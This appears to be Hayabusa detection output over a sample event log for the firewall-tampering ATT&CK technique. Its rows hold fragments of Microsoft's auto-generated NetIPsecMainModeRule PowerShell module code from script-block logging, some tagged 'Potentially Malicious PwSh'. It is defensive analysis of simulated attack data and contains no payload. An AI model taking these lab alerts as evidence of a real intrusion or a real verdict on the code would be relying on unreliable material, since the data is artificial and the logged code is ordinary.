$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 